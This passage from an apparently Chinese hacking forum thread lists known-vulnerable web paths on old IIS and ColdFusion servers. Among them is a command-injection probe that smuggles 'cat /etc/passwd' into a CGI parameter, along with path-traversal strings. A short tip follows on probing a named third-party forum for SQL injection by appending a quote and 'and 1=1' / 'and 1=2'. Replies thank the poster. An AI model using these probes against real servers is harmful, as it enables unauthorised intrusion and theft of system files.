/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SELECTOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../
在他的网页后面加\'，看回复的是不是错误的回答，然后加 and 1=1
和and 1=2 再试一试，然后自己努力把， 要在对方例如http://www.hackerxfiles.net/bbs/post.asp？action=1这样的名字后面加

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)

都是批处理，辛苦了

这个貌似我在搜索批处理时也看过 啊

幸苦LZ~
好东西

感谢分享